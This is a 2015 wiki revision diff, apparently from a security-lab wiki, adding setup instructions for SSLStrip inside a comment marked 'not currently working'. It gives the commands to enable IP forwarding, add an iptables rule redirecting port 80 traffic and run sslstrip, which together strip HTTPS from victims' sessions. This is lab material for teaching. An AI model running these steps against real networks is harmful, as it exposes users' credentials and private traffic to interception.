SSLStrip: Difference between revisions

Revision as of 23:34, 29 August 2015

@@ Line 1: / Line 1: @@
+<!--
+NOT CURRENTLY WORKING.
 SSLStrip is a way of conducting a man in the middle attack such that the user inserts themselves between the sheep and the server for SSL sessions.
-While the Sheep may notice something fishy, the SSLStrip attack ensures that the user merely needs to accept the attacker's certificate once. From that point forward, all secure connections the sheep may make are compromised.
+Implements Moxie Marlinspike's HTTPS attacks. https://pypi.python.org/pypi/sslstrip
+=Setup=
+==Installing==
+Install SSLStrip with Python:
+<pre>
+$ pip install sslstrip
+</pre>
+==Running==
+To run SSLStrip, first enable IP packet forwarding. Normally, every packet that reaches a network device that isn't intended for that device is dropped. This changes that behavior so the packet is forwarded by default:
+<pre>
+$ echo "1" > /proc/sys/net/ipv4/ip_forward
+</pre>
+Now you'll set up SSLStrip to listen on a particular part, and you'll use iptables (a firewall utility for Unix) to listen for HTTPS traffic and forward it to SSLStrip:
+<pre>
+$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666
+</pre>
+Now SSLStrip will turn that HTTPS connection into HTTP, stripping it of its encryption layer.
+Run it:
+<pre>
+$ sslstrip.py -l 6666
+</pre>
+-->
 {{MITMFlag}}
-[[Category:Kali]]
+[[Category:SSLStrip]]
+[[Category:SSL]]